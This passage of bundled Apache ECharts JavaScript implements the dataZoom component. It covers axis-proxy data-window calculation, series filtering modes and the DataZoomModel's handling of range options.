this.getAxisModel();\n        var isCartesian = axisDim === 'x' || axisDim === 'y';\n        var otherAxisDim;\n        var coordSysIndexName;\n        if (isCartesian) {\n            coordSysIndexName = 'gridIndex';\n            otherAxisDim = axisDim === 'x' ? 'y' : 'x';\n        }\n        else {\n            coordSysIndexName = 'polarIndex';\n            otherAxisDim = axisDim === 'angle' ? 'radius' : 'angle';\n        }\n        var foundOtherAxisModel;\n        ecModel.eachComponent(otherAxisDim + 'Axis', function (otherAxisModel) {\n            if ((otherAxisModel.get(coordSysIndexName) || 0)\n                === (axisModel.get(coordSysIndexName) || 0)\n            ) {\n                foundOtherAxisModel = otherAxisModel;\n            }\n        });\n        return foundOtherAxisModel;\n    },\n\n    getMinMaxSpan: function () {\n        return clone(this._minMaxSpan);\n    },\n\n    /**\n     * Only calculate by given range and this._dataExtent, do not change anything.\n     *\n     * @param {Object} opt\n     * @param {number} [opt.start]\n     * @param {number} [opt.end]\n     * @param {number} [opt.startValue]\n     * @param {number} [opt.endValue]\n     */\n    calculateDataWindow: function (opt) {\n        var dataExtent = this._dataExtent;\n        var axisModel = this.getAxisModel();\n        var scale = axisModel.axis.scale;\n        var rangePropMode = this._dataZoomModel.getRangePropMode();\n        var percentExtent = [0, 100];\n        var percentWindow = [];\n        var valueWindow = [];\n        var hasPropModeValue;\n\n        each$20(['start', 'end'], function (prop, idx) {\n            var boundPercent = opt[prop];\n            var boundValue = opt[prop + 'Value'];\n\n            // Notice: dataZoom is based either on `percentProp` ('start', 'end') or\n            // on `valueProp` ('startValue', 'endValue'). (They are based on the data extent\n            // but not min/max of axis, which will be calculated by data window then).\n            // The former one is suitable for cases that a dataZoom component controls multiple\n            // axes with different unit or extent, and the latter one is suitable for accurate\n            // zoom by pixel (e.g., in dataZoomSelect).\n            // we use `getRangePropMode()` to mark which prop is used. `rangePropMode` is updated\n            // only when setOption or dispatchAction, otherwise it remains its original value.\n            // (Why not only record `percentProp` and always map to `valueProp`? Because\n            // the map `valueProp` -> `percentProp` -> `valueProp` probably not the original\n            // `valueProp`. consider two axes constrolled by one dataZoom. They have different\n            // data extent. All of values that are overflow the `dataExtent` will be calculated\n            // to percent '100%').\n\n            if (rangePropMode[idx] === 'percent') {\n                boundPercent == null && (boundPercent = percentExtent[idx]);\n                // Use scale.parse to math round for category or time axis.\n                boundValue = scale.parse(linearMap(\n                    boundPercent, percentExtent, dataExtent\n                ));\n            }\n            else {\n                hasPropModeValue = true;\n                boundValue = boundValue == null ? dataExtent[idx] : scale.parse(boundValue);\n                // Calculating `percent` from `value` may be not accurate, because\n                // This calculation can not be inversed, because all of values that\n                // are overflow the `dataExtent` will be calculated to percent '100%'\n                boundPercent = linearMap(\n                    boundValue, dataExtent, percentExtent\n                );\n            }\n\n            // valueWindow[idx] = round(boundValue);\n            // percentWindow[idx] = round(boundPercent);\n            valueWindow[idx] = boundValue;\n            percentWindow[idx] = boundPercent;\n        });\n\n        asc$1(valueWindow);\n        asc$1(percentWindow);\n\n        // The windows from user calling of `dispatchAction` might be out of the extent,\n        // or do not obey the `min/maxSpan`, `min/maxValueSpan`. But we dont restrict window\n        // by `zoomLock` here, because we see `zoomLock` just as a interaction constraint,\n        // where API is able to initialize/modify the window size even though `zoomLock`\n        // specified.\n        var spans = this._minMaxSpan;\n        hasPropModeValue\n            ? restrictSet(valueWindow, percentWindow, dataExtent, percentExtent, false)\n            : restrictSet(percentWindow, valueWindow, percentExtent, dataExtent, true);\n\n        function restrictSet(fromWindow, toWindow, fromExtent, toExtent, toValue) {\n            var suffix = toValue ? 'Span' : 'ValueSpan';\n            sliderMove(0, fromWindow, fromExtent, 'all', spans['min' + suffix], spans['max' + suffix]);\n            for (var i = 0; i < 2; i++) {\n                toWindow[i] = linearMap(fromWindow[i], fromExtent, toExtent, true);\n                toValue && (toWindow[i] = scale.parse(toWindow[i]));\n            }\n        }\n\n        return {\n            valueWindow: valueWindow,\n            percentWindow: percentWindow\n        };\n    },\n\n    /**\n     * Notice: reset should not be called before series.restoreData() called,\n     * so it is recommanded to be called in \"process stage\" but not \"model init\n     * stage\".\n     *\n     * @param {module: echarts/component/dataZoom/DataZoomModel} dataZoomModel\n     */\n    reset: function (dataZoomModel) {\n        if (dataZoomModel !== this._dataZoomModel) {\n            return;\n        }\n\n        var targetSeries = this.getTargetSeriesModels();\n        // Culculate data window and data extent, and record them.\n        this._dataExtent = calculateDataExtent(this, this._dimName, targetSeries);\n\n        // this.hasSeriesStacked = false;\n        // each(targetSeries, function (series) {\n            // var data = series.getData();\n            // var dataDim = data.mapDimension(this._dimName);\n            // var stackedDimension = data.getCalculationInfo('stackedDimension');\n            // if (stackedDimension && stackedDimension === dataDim) {\n                // this.hasSeriesStacked = true;\n            // }\n        // }, this);\n\n        // `calculateDataWindow` uses min/maxSpan.\n        setMinMaxSpan(this);\n\n        var dataWindow = this.calculateDataWindow(dataZoomModel.settledOption);\n\n        this._valueWindow = dataWindow.valueWindow;\n        this._percentWindow = dataWindow.percentWindow;\n\n        // Update axis setting then.\n        setAxisModel(this);\n    },\n\n    /**\n     * @param {module: echarts/component/dataZoom/DataZoomModel} dataZoomModel\n     */\n    restore: function (dataZoomModel) {\n        if (dataZoomModel !== this._dataZoomModel) {\n            return;\n        }\n\n        this._valueWindow = this._percentWindow = null;\n        setAxisModel(this, true);\n    },\n\n    /**\n     * @param {module: echarts/component/dataZoom/DataZoomModel} dataZoomModel\n     */\n    filterData: function (dataZoomModel, api) {\n        if (dataZoomModel !== this._dataZoomModel) {\n            return;\n        }\n\n        var axisDim = this._dimName;\n        var seriesModels = this.getTargetSeriesModels();\n        var filterMode = dataZoomModel.get('filterMode');\n        var valueWindow = this._valueWindow;\n\n        if (filterMode === 'none') {\n            return;\n        }\n\n        // FIXME\n        // Toolbox may has dataZoom injected. And if there are stacked bar chart\n        // with NaN data, NaN will be filtered and stack will be wrong.\n        // So we need to force the mode to be set empty.\n        // In fect, it is not a big deal that do not support filterMode-'filter'\n        // when using toolbox#dataZoom, utill tooltip#dataZoom support \"single axis\n        // selection\" some day, which might need \"adapt to data extent on the\n        // otherAxis\", which is disabled by filterMode-'empty'.\n        // But currently, stack has been fixed to based on value but not index,\n        // so this is not an issue any more.\n        // var otherAxisModel = this.getOtherAxisModel();\n        // if (dataZoomModel.get('$fromToolbox')\n        //     && otherAxisModel\n        //     && otherAxisModel.hasSeriesStacked\n        // ) {\n        //     filterMode = 'empty';\n        // }\n\n        // TODO\n        // filterMode 'weakFilter' and 'empty' is not optimized for huge data yet.\n\n        each$20(seriesModels, function (seriesModel) {\n            var seriesData = seriesModel.getData();\n            var dataDims = seriesData.mapDimension(axisDim, true);\n\n            if (!dataDims.length) {\n                return;\n            }\n\n            if (filterMode === 'weakFilter') {\n                seriesData.filterSelf(function (dataIndex) {\n                    var leftOut;\n                    var rightOut;\n                    var hasValue;\n                    for (var i = 0; i < dataDims.length; i++) {\n                        var value = seriesData.get(dataDims[i], dataIndex);\n                        var thisHasValue = !isNaN(value);\n                        var thisLeftOut = value < valueWindow[0];\n                        var thisRightOut = value > valueWindow[1];\n                        if (thisHasValue && !thisLeftOut && !thisRightOut) {\n                            return true;\n                        }\n                        thisHasValue && (hasValue = true);\n                        thisLeftOut && (leftOut = true);\n                        thisRightOut && (rightOut = true);\n                    }\n                    // If both left out and right out, do not filter.\n                    return hasValue && leftOut && rightOut;\n                });\n            }\n            else {\n                each$20(dataDims, function (dim) {\n                    if (filterMode === 'empty') {\n                        seriesModel.setData(\n                            seriesData = seriesData.map(dim, function (value) {\n                                return !isInWindow(value) ? NaN : value;\n                            })\n                        );\n                    }\n                    else {\n                        var range = {};\n                        range[dim] = valueWindow;\n\n                        // console.time('select');\n                        seriesData.selectRange(range);\n                        // console.timeEnd('select');\n                    }\n                });\n            }\n\n            each$20(dataDims, function (dim) {\n                seriesData.setApproximateExtent(valueWindow, dim);\n            });\n        });\n\n        function isInWindow(value) {\n            return value >= valueWindow[0] && value <= valueWindow[1];\n        }\n    }\n};\n\nfunction calculateDataExtent(axisProxy, axisDim, seriesModels) {\n    var dataExtent = [Infinity, -Infinity];\n\n    each$20(seriesModels, function (seriesModel) {\n        var seriesData = seriesModel.getData();\n        if (seriesData) {\n            each$20(seriesData.mapDimension(axisDim, true), function (dim) {\n                var seriesExtent = seriesData.getApproximateExtent(dim);\n                seriesExtent[0] < dataExtent[0] && (dataExtent[0] = seriesExtent[0]);\n                seriesExtent[1] > dataExtent[1] && (dataExtent[1] = seriesExtent[1]);\n            });\n        }\n    });\n\n    if (dataExtent[1] < dataExtent[0]) {\n        dataExtent = [NaN, NaN];\n    }\n\n    // It is important to get \"consistent\" extent when more then one axes is\n    // controlled by a `dataZoom`, otherwise those axes will not be synchronized\n    // when zooming. But it is difficult to know what is \"consistent\", considering\n    // axes have different type or even different meanings (For example, two\n    // time axes are used to compare data of the same date in different years).\n    // So basically dataZoom just obtains extent by series.data (in category axis\n    // extent can be obtained from axis.data).\n    // Nevertheless, user can set min/max/scale on axes to make extent of axes\n    // consistent.\n    fixExtentByAxis(axisProxy, dataExtent);\n\n    return dataExtent;\n}\n\nfunction fixExtentByAxis(axisProxy, dataExtent) {\n    var axisModel = axisProxy.getAxisModel();\n    var min = axisModel.getMin(true);\n\n    // For category axis, if min/max/scale are not set, extent is determined\n    // by axis.data by default.\n    var isCategoryAxis = axisModel.get('type') === 'category';\n    var axisDataLen = isCategoryAxis && axisModel.getCategories().length;\n\n    if (min != null && min !== 'dataMin' && typeof min !== 'function') {\n        dataExtent[0] = min;\n    }\n    else if (isCategoryAxis) {\n        dataExtent[0] = axisDataLen > 0 ? 0 : NaN;\n    }\n\n    var max = axisModel.getMax(true);\n    if (max != null && max !== 'dataMax' && typeof max !== 'function') {\n        dataExtent[1] = max;\n    }\n    else if (isCategoryAxis) {\n        dataExtent[1] = axisDataLen > 0 ? axisDataLen - 1 : NaN;\n    }\n\n    if (!axisModel.get('scale', true)) {\n        dataExtent[0] > 0 && (dataExtent[0] = 0);\n        dataExtent[1] < 0 && (dataExtent[1] = 0);\n    }\n\n    // For value axis, if min/max/scale are not set, we just use the extent obtained\n    // by series data, which may be a little different from the extent calculated by\n    // `axisHelper.getScaleExtent`. But the different just affects the experience a\n    // little when zooming. So it will not be fixed until some users require it strongly.\n\n    return dataExtent;\n}\n\nfunction setAxisModel(axisProxy, isRestore) {\n    var axisModel = axisProxy.getAxisModel();\n\n    var percentWindow = axisProxy._percentWindow;\n    var valueWindow = axisProxy._valueWindow;\n\n    if (!percentWindow) {\n        return;\n    }\n\n    // [0, 500]: arbitrary value, guess axis extent.\n    var precision = getPixelPrecision(valueWindow, [0, 500]);\n    precision = Math.min(precision, 20);\n    // isRestore or isFull\n    var useOrigin = isRestore || (percentWindow[0] === 0 && percentWindow[1] === 100);\n\n    axisModel.setRange(\n        useOrigin ? null : +valueWindow[0].toFixed(precision),\n        useOrigin ? null : +valueWindow[1].toFixed(precision)\n    );\n}\n\nfunction setMinMaxSpan(axisProxy) {\n    var minMaxSpan = axisProxy._minMaxSpan = {};\n    var dataZoomModel = axisProxy._dataZoomModel;\n    var dataExtent = axisProxy._dataExtent;\n\n    each$20(['min', 'max'], function (minMax) {\n        var percentSpan = dataZoomModel.get(minMax + 'Span');\n        var valueSpan = dataZoomModel.get(minMax + 'ValueSpan');\n        valueSpan != null && (valueSpan = axisProxy.getAxisModel().axis.scale.parse(valueSpan));\n\n        // minValueSpan and maxValueSpan has higher priority than minSpan and maxSpan\n        if (valueSpan != null) {\n            percentSpan = linearMap(\n                dataExtent[0] + valueSpan, dataExtent, [0, 100], true\n            );\n        }\n        else if (percentSpan != null) {\n            valueSpan = linearMap(\n                percentSpan, [0, 100], dataExtent, true\n            ) - dataExtent[0];\n        }\n\n        minMaxSpan[minMax + 'Span'] = percentSpan;\n        minMaxSpan[minMax + 'ValueSpan'] = valueSpan;\n    });\n}\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar each$19 = each$1;\nvar eachAxisDim = eachAxisDim$1;\n\nvar DataZoomModel = extendComponentModel({\n\n    type: 'dataZoom',\n\n    dependencies: [\n        'xAxis', 'yAxis', 'zAxis', 'radiusAxis', 'angleAxis', 'singleAxis', 'series'\n    ],\n\n    /**\n     * @protected\n     */\n    defaultOption: {\n        zlevel: 0,\n        z: 4,                   // Higher than normal component (z: 2).\n        orient: null,           // Default auto by axisIndex. Possible value: 'horizontal', 'vertical'.\n        xAxisIndex: null,       // Default the first horizontal category axis.\n        yAxisIndex: null,       // Default the first vertical category axis.\n\n        filterMode: 'filter',   // Possible values: 'filter' or 'empty' or 'weakFilter'.\n                                // 'filter': data items which are out of window will be removed. This option is\n                                //          applicable when filtering outliers. For each data item, it will be\n                                //          filtered if one of the relevant dimensions is out of the window.\n                                // 'weakFilter': data items which are out of window will be removed. This option\n                                //          is applicable when filtering outliers. For each data item, it will be\n                                //          filtered only if all  of the relevant dimensions are out of the same\n                                //          side of the window.\n                                // 'empty': data items which are out of window will be set to empty.\n                                //          This option is applicable when user should not neglect\n                                //          that there are some data items out of window.\n                                // 'none': Do not filter.\n                                // Taking line chart as an example, line will be broken in\n                                // the filtered points when filterModel is set to 'empty', but\n                                // be connected when set to 'filter'.\n\n        throttle: null,         // Dispatch action by the fixed rate, avoid frequency.\n                                // default 100. Do not throttle when use null/undefined.\n                                // If animation === true and animationDurationUpdate > 0,\n                                // default value is 100, otherwise 20.\n        start: 0,               // Start percent. 0 ~ 100\n        end: 100,               // End percent. 0 ~ 100\n        startValue: null,       // Start value. If startValue specified, start is ignored.\n        endValue: null,         // End value. If endValue specified, end is ignored.\n        minSpan: null,          // 0 ~ 100\n        maxSpan: null,          // 0 ~ 100\n        minValueSpan: null,     // The range of dataZoom can not be smaller than that.\n        maxValueSpan: null,     // The range of dataZoom can not be larger than that.\n        rangeMode: null         // Array, can be 'value' or 'percent'.\n    },\n\n    /**\n     * @override\n     */\n    init: function (option, parentModel, ecModel) {\n\n        /**\n         * key like x_0, y_1\n         * @private\n         * @type {Object}\n         */\n        this._dataIntervalByAxis = {};\n\n        /**\n         * @private\n         */\n        this._dataInfo = {};\n\n        /**\n         * key like x_0, y_1\n         * @private\n         */\n        this._axisProxies = {};\n\n        /**\n         * @readOnly\n         */\n        this.textStyleModel;\n\n        /**\n         * @private\n         */\n        this._autoThrottle = true;\n\n        /**\n         * It is `[rangeModeForMin, rangeModeForMax]`.\n         * The optional values for `rangeMode`:\n         * + `'value'` mode: the axis extent will always be determined by\n         *     `dataZoom.startValue` and `dataZoom.endValue`, despite\n         *     how data like and how `axis.min` and `axis.max` are.\n         * + `'percent'` mode: `100` represents 100% of the `[dMin, dMax]`,\n         *     where `dMin` is `axis.min` if `axis.min` specified, otherwise `data.extent[0]`,\n         *     and `dMax` is `axis.max` if `axis.max` specified, otherwise `data.extent[1]`.\n         *     Axis extent will be determined by the result of the percent of `[dMin, dMax]`.\n         *\n         * For example, when users are using dynamic data (update data periodically via `setOption`),\n         * if in `'value`' mode, the window will be kept in a fixed value range despite how\n         * data are appended, while if in `'percent'` mode, whe window range will be changed alone with\n         * the appended data (suppose `axis.min` and `axis.max` are not specified).\n         *\n         * @private\n         */\n        this._rangePropMode = ['percent', 'percent'];\n\n        var inputRawOption = retrieveRawOption(option);\n\n        /**\n         * Suppose a \"main process\" start at the point that model prepared (that is,\n         * model initialized or merged or method called in `action`).\n         * We should keep the `main process` idempotent, that is, given a set of values\n         * on `option`, we get the same result.\n         *\n         * But sometimes, values on `option` will be updated for providing users\n         * a \"final calculated value\" (`dataZoomProcessor` will do that). Those value\n         * should not be the base/input of the `main process`.\n         *\n         * So in that case we should save and keep the input of the `main process`\n         * separately, called `settledOption`.\n         *\n         * For example, consider the case:\n         * (Step_1) brush zoom the grid by `toolbox.dataZoom`,\n         *     where the original input `option.startValue`, `option.endValue` are earsed by\n         *     calculated value.\n         * (Step)2) click the legend to hide and show a series,\n         *     where the new range is calculated by the earsed `startValue` and `endValue`,\n         *     which brings incorrect result.\n         *\n         * @readOnly\n         */\n        this.settledOption = inputRawOption;\n\n        this.mergeDefaultAndTheme(option, ecModel);\n\n        this.doInit(inputRawOption);\n    },\n\n    /**\n     * @override\n     */\n    mergeOption: function (newOption) {\n        var inputRawOption = retrieveRawOption(newOption);\n\n        //FIX #2591\n        merge(this.option, newOption, true);\n        merge(this.settledOption, inputRawOption, true);\n\n        this.doInit(inputRawOption);\n    },\n\n    /**\n     * @protected\n     */\n    doInit: function (inputRawOption) {\n        var thisOption = this.option;\n\n        // Disable realtime view update if canvas is not supported.\n        if (!env$1.canvasSupported) {\n            thisOption.realtime = false;\n        }\n\n        this._setDefaultThrottle(inputRawOption);\n\n        updateRangeUse(this, inputRawOption);\n\n        var settledOption = this.settledOption;\n        each$19([['start', 'startValue'], ['end', 'endValue']], function (names, index) {\n            // start/end has higher priority over startValue/endValue if they\n            // both set, but we should make chart.setOption({endValue: 1000})\n            // effective, rather than chart.setOption({endValue: 1000, end: null}).\n            if (this._rangePropMode[index] === 'value') {\n                thisOption[names[0]] = settledOption[names[0]] = null;\n            }\n            // Otherwise do nothing and use the merge result.\n        }, this);\n\n        this.textStyleModel = this.getModel('textStyle');\n\n        this._resetTarget();\n\n        this._giveAxisProxies();\n    },\n\n    /**\n     * @private\n     */\n    _giveAxisProxies: function () {\n        var axisProxies = this._axisProxies;\n\n        this.eachTargetAxis(function (dimNames, axisIndex, dataZoomModel, ecModel) {\n            var axisModel = this.dependentModels[dimNames.axis][axisIndex];\n\n            // If exists, share axisProxy with other dataZoomModels.\n            var axisProxy = axisModel.__dzAxisProxy || (\n                // Use the first dataZoomModel as the main model of axisProxy.\n                axisModel.__dzAxisProxy = new AxisProxy(\n                    dimNames.name, axisIndex, this, ecModel\n                )\n            );\n            // FIXME\n            // dispose __dzAxisProxy\n\n            axisProxies[dimNames.name + '_' + axisIndex] = axisProxy;\n        }, this);\n    },\n\n    /**\n     * @private\n     */\n    _resetTarget: function () {\n        var thisOption = this.option;\n\n        var autoMode = this._judgeAutoMode();\n\n        eachAxisDim(function (dimNames) {\n            var axisIndexName = dimNames.axisIndex;\n            thisOption[axisIndexName] = normalizeToArray(\n                thisOption[axisIndexName]\n            );\n        }, this);\n\n        if (autoMode === 'axisIndex') {\n            this._autoSetAxisIndex();\n        }\n        else if (autoMode === 'orient') {\n            this._autoSetOrient();\n        }\n    },\n\n    /**\n     * @private\n     */\n    _judgeAutoMode: function () {\n        // Auto set only works for setOption at the first time.\n        // The following is user's reponsibility. So using merged\n        // option is OK.\n        var thisOption = this.option;\n\n        var hasIndexSpecified = false;\n        eachAxisDim(function (dimNames) {\n            // When user set axisIndex as a empty array, we think that user specify axisIndex\n            // but do not want use auto mode. Because empty array may be encountered when\n            // some error occured.\n            if (thisOption[dimNames.axisIndex] != null) {\n                hasIndexSpecified = true;\n            }\n        }, this);\n\n        var orient = thisOption.orient;\n\n        if (orient == null && hasIndexSpecified) {\n            return 'orient';\n        }\n        else if (!hasIndexSpecified) {\n            if (orient == null) {\n                thisOption.orient = 'horizontal';\n            }\n            return 'axisIndex';\n        }\n    },\n\n    /**\n     * @private\n     */\n    _autoSetAxisIndex: function () {\n        var autoAxisIndex = true;\n        var orient = this.get('orient', true);\n        var thisOption = this.option;\n        var dependentModels = this.dependentModels;\n\n        if (autoAxisIndex) {\n            // Find axis that parallel to dataZoom as default.\n            var dimName = orient === 'vertical' ? 'y' : 'x';\n\n            if (dependentModels[dimName + 'Axis'].length) {\n                thisOption[dimName + 'AxisIndex'] = [0];\n                autoAxisIndex = false;\n            }\n            else {\n                each$19(dependentModels.singleAxis, function (singleAxisModel) {\n                    if (autoAxisIndex && singleAxisModel.get('orient', true) === orient) {\n                        thisOption.singleAxisIndex = [singleAxisModel.componentIndex];\n                        autoAxisIndex = false;\n                    }\n                });\n            }\n        }\n\n        if (autoAxisIndex) {\n            // Find the first category axis as default. (consider polar)\n            eachAxisDim(function (dimNames) {\n                if (!autoAxisIndex) {\n                    return;\n                }\n                var axisIndices = [];\n                var axisModels = this.dependentModels[dimNames.axis];\n                if (axisModels.length && !axisIndices.length) {\n                    for (var i = 0, len = axisModels.length; i < len; i++) {\n                        if (axisModels[i].get('type') === 'category') {\n                            axisIndices.push(i);\n                        }\n                    }\n                }\n                thisOption[dimNames.axisIndex] = axisIndices;\n                if (axisIndices.length) {\n                    autoAxisIndex = false;\n                }\n            }, this);\n        }\n\n        if (autoAxisIndex) {\n            // FIXME\n            // 这里是兼容ec2的写法（没指定xAxisIndex和yAxisIndex时把scatter和双数值轴折柱纳入dataZoom控制），\n            // 但是实际是否需要Grid.js#getScaleByOption来判断（考虑time，log等axis type）？\n\n            // If both dataZoom.xAxisIndex and dataZoom.yAxisIndex is not specified,\n            // dataZoom component auto adopts series that reference to\n            // both xAxis and yAxis which type is 'value'.\n            this.ecModel.eachSeries(function (seriesModel) {\n                if (this._isSeriesHasAllAxesTypeOf(seriesModel, 'value')) {\n                    eachAxisDim(function (dimNames) {\n                        var axisIndices = thisOption[dimNames.axisIndex];\n\n                        var axisIndex = seriesModel.get(dimNames.axisIndex);\n                        var axisId = seriesModel.get(dimNames.axisId);\n\n                        var axisModel = seriesModel.ecModel.queryComponents({\n                            mainType: dimNames.axis,\n                            index: axisIndex,\n                            id: axisId\n                        })[0];\n\n                        if (__DEV__) {\n                            if (!axisModel) {\n                                throw new Error(\n                                    dimNames.axis + ' \"' + retrieve(\n                                        axisIndex,\n                                        axisId,\n                                        0\n                                    ) + '\" not found'\n                                );\n                            }\n                        }\n                        axisIndex = axisModel.componentIndex;\n\n                        if (indexOf(axisIndices, axisIndex) < 0) {\n                            axisIndices.push(axisIndex);\n                        }\n                    });\n                }\n            }, this);\n        }\n    },\n\n    /**\n     * @private\n     */\n    _autoSetOrient: function () {\n        var dim;\n\n        // Find the first axis\n        this.eachTargetAxis(function (dimNames) {\n            !dim && (dim = dimNames.name);\n        }, this);\n\n        this.option.orient = dim === 'y' ? 'vertical' : 'horizontal';\n    },\n\n    /**\n     * @private\n     */\n    _isSeriesHasAllAxesTypeOf: function (seriesModel, axisType) {\n        // FIXME\n        // 需要series的xAxisIndex和yAxisIndex都首先自动设置上。\n        // 例如series.type === scatter时。\n\n        var is = true;\n        eachAxisDim(function (dimNames) {\n            var seriesAxisIndex = seriesModel.get(dimNames.axisIndex);\n            var axisModel = this.dependentModels[dimNames.axis][seriesAxisIndex];\n\n            if (!axisModel || axisModel.get('type') !== axisType) {\n                is = false;\n            }\n        }, this);\n        return is;\n    },\n\n    /**\n     * @private\n     */\n    _setDefaultThrottle: function (inputRawOption) {\n        // When first time user set throttle, auto throttle ends.\n        if (inputRawOption.hasOwnProperty('throttle')) {\n            this._autoThrottle = false;\n        }\n        if (this._autoThrottle) {\n            var globalOption = this.ecModel.option;\n            this.option.throttle = (\n                globalOption.animation && globalOption.animationDurationUpdate > 0\n            ) ? 100 : 20;\n        }\n    },\n\n    /**\n     * @public\n     */\n    getFirstTargetAxisModel: function () {\n        var firstAxisModel;\n        eachAxisDim(function (dimNames) {\n            if (firstAxisModel == null) {\n                var indices = this.get(dimNames.axisIndex);\n                if (indices.length) {\n                    firstAxisModel = this.dependentModels[dimNames.axis][indices[0]];\n                }\n            }\n        }, this);\n\n        return firstAxisModel;\n    },\n\n    /**\n     * @public\n     * @param {Function} callback param: axisModel, dimNames, axisIndex, dataZoomModel, ecModel\n     */\n    eachTargetAxis: function (callback, context) {\n        var ecModel = this.ecModel;\n        eachAxisDim(function (dimNames) {\n            each$19(\n                this.get(dimNames.axisIndex),\n                function (axisIndex) {\n                    callback.call(context, dimNames, axisIndex, this, ecModel);\n                },\n                this\n            );\n        }, this);\n    },\n\n    /**\n     * @param {string} dimName\n     * @param {number} axisIndex\n     * @return {module:echarts/component/dataZoom/AxisProxy} If not found, return null/undefined.\n     */\n    getAxisProxy: function (dimName, axisIndex) {\n        return this._axisProxies[dimName + '_' + axisIndex];\n    },\n\n    /**\n     * @param {string} dimName\n     * @param {number} axisIndex\n     * @return {module:echarts/model/Model} If not found, return null/undefined.\n     */\n    getAxisModel: function (dimName, axisIndex) {\n        var axisProxy = this.getAxisProxy(dimName, axisIndex);\n        return axisProxy && axisProxy.getAxisModel();\n    },\n\n    /**\n     * If not specified, set to undefined.\n     *\n     * @public\n     * @param {Object} opt\n     * @param {number} [opt.start]\n     * @param {number} [opt.end]\n     * @param {number} [opt.startValue]\n     * @param {number} [opt.endValue]\n     */\n    setRawRange: function (opt) {\n        var thisOption = this.option;\n        var settledOption = this.settledOption;\n        each$19([['start', 'startValue'], ['end', 'endValue']], function (names) {\n            // Consider the pair <start, startValue>:\n            // If one has value and the other one is `null/undefined`, we both set them\n            // to `settledOption`. This strategy enables the feature to clear the original\n            // value in `settledOption` to `null/undefined`.\n            // But if both of them are `null/undefined`, we do not set them to `settledOption`\n            // and keep `settledOption` with the original value. This strategy enables users to\n            // only set <end or endValue> but not set <start or startValue> when calling\n            // `dispatchAction`.\n            // The pair <end, endValue> is treated in the same way.\n            if (opt[names[0]] != null || opt[names[1]] != null) {\n                thisOption[names[0]] = settledOption[names[0]] = opt[names[0]];\n                thisOption[names[1]] = settledOption[names[1]] = opt[names[1]];\n            }\n        }, this);\n\n        updateRangeUse(this, opt);\n    },\n\n    /**\n     * @public\n     * @param {Object} opt\n     * @param {number} [opt.start]\n     * @param {number} [opt.end]\n     * @param {number} [opt.startValue]\n     * @param {number} [opt.endValue]\n     */\n    setCalculatedRange: function (opt) {\n        var option = this.option;\n        each$19(['start', 'startValue', 'end', 'endValue'], function (name) {\n            option[name] = opt[name];\n        });\n    },\n\n    /**\n     * @public\n     * @return {Array.<number>} [startPercent, endPercent]\n     */\n    getPercentRange: function () {\n        var axisProxy = this.findRepresentativeAxisProxy();\n        if (axisProxy) {\n            return axisProxy.getDataPercentWindow();\n        }\n    },\n\n    /**\n     * @public\n     * For example, chart.getModel().getComponent('dataZoom').getValueRange('y', 0);\n     *\n     * @param {string} [axisDimName]\n     * @param {number} [axisIndex]\n     * @return {Array.<number>} [startValue, endValue] value can only be '-' or finite number.\n     */\n    getValueRange: function (axisDimName, axisIndex) {\n        if (axisDimName == null && axisIndex == null) {\n            var axisProxy = this.findRepresentativeAxisProxy();\n            if (axisProxy) {\n                return axisProxy.getDataValueWindow();\n            }\n        }\n        else {\n            return this.getAxisProxy(axisDimName, axisIndex).getDataValueWindow();\n        }\n    },\n\n    /**\n     * @public\n     * @param {module:echarts/model/Model} [axisModel] If axisModel given, find axisProxy\n     *      corresponding to the axisModel\n     * @return {module:echarts/component/dataZoom/AxisProxy}\n     */\n    findRepresentativeAxisProxy: function (axisModel) {\n        if (axisModel) {\n            return axisModel.__dzAxisProxy;\n        }\n\n        // Find the first hosted axisProxy\n        var axisProxies = this._axisProxies;\n        for (var key in axisProxies) {\n            if (axisProxies.hasOwnProperty(key) && axisProxies[key].hostedBy(this)) {\n                return axisProxies[key];\n            }\n        }\n\n        // If no hosted axis find not hosted axisProxy.\n        // Consider this case: dataZoomModel1 and dataZoomModel2 control the same axis,\n        // and the option.start or option.end settings are different. The percentRange\n        // should follow axisProxy.\n        // (We encounter this problem in toolbox data zoom.)\n        for (var key in axisProxies) {\n            if (axisProxies.hasOwnProperty(key) && !axisProxies[key].hostedBy(this)) {\n                return axisProxies[key];\n            }\n        }\n    },\n\n    /**\n     * @return {Array.<string>}\n     */\n    getRangePropMode: function () {\n        return this._rangePropMode.slice();\n    }\n\n});\n\n/**\n * Retrieve the those raw params from option, which will be cached separately.\n * becasue they will be overwritten by normalized/calculated values in the main\n * process.\n */\nfunction retrieveRawOption(option) {\n    var ret = {};\n    each$19(\n        ['start', 'end', 'startValue', 'endValue', 'throttle'],\n        function (name) {\n            option.hasOwnProperty(name) && (ret[name] = option[name]);\n        }\n    );\n    return ret;\n}\n\nfunction updateRangeUse(dataZoomModel, inputRawOption) {\n    var rangePropMode = dataZoomModel._rangePropMode;\n    var rangeModeInOption = dataZoomModel.get('rangeMode');\n\n    each$19([['start', 'startValue'], ['end', 'endValue']], function (names, index) {\n        var percentSpecified = inputRawOption[names[0]] != null;\n        var valueSpecified = inputRawOption[names[1]] != null;\n        if (percentSpecified && !valueSpecified) {\n            rangePropMode[index] = 'percent';\n        }\n        else if (!percentSpecified && valueSpecified) {\n            rangePropMode[index] = 'value';\n        }\n        else if (rangeModeInOption) {\n            rangePropMode[index] = rangeModeInOption[index];\n        }\n        else if (percentSpecified) { // percentSpecified && valueSpecified\n            rangePropMode[index] = 'percent';\n        }\n        // else remain its original setting.\n    });\n}\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and 